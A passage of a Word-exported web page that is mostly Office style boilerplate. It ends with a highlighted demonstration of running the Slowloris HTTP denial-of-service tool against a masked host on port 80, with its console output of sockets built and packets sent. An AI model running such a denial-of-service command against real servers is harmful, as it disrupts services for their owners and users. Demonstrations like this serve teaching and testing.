<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="59" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
<br />
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US" style="background: none repeat scroll 0% 0% yellow;">./slowloris.pl
-dns xxx.xxx.xxx -port 80 -timeout 2000 -num 100 -tcpto 5</span><span lang="EN-US"></span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">CCCCCCCCCCOOCCOOOOO888@8@8888OOOOCCOOO888888888@@@@@@@@@8@8@@@@888OOCooocccc::::</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">CCCCCCCCCCCCCCCOO888@888888OOOCCCOOOO888888888888@88888@@@@@@@888@8OOCCoococc:::</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">CCCCCCCCCCCCCCOO88@@888888OOOOOOOOOO8888888O88888888O8O8OOO8888@88@@8OOCOOOCoc::</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><b><span lang="EN-US">…[omitted]…</span></b></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US" style="background: none repeat scroll 0% 0% yellow;">Welcome
to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client</span><span lang="EN-US"></span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">Multithreading enabled.</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US" style="background: none repeat scroll 0% 0% yellow;">Connecting
to xxx.xxx.xxx:80 every 2000 seconds with 100 sockets:</span><span lang="EN-US"></span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">
Building sockets.</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">
Building sockets.</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">
Sending data.</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US" style="background: none repeat scroll 0% 0% yellow;">Current
stats: Slowloris has now sent 446
packets successfully.</span><span lang="EN-US"></span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">This thread now sleeping for 2000 seconds...</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<br /></div>
<div class="MsoNormal" style="margin-left: 0cm;">
<span style="font-size: x-small;"><span lang="EN-US">
Sending data.</span></span></div>
<div class="MsoNormal" style="margin-left: 0cm;">
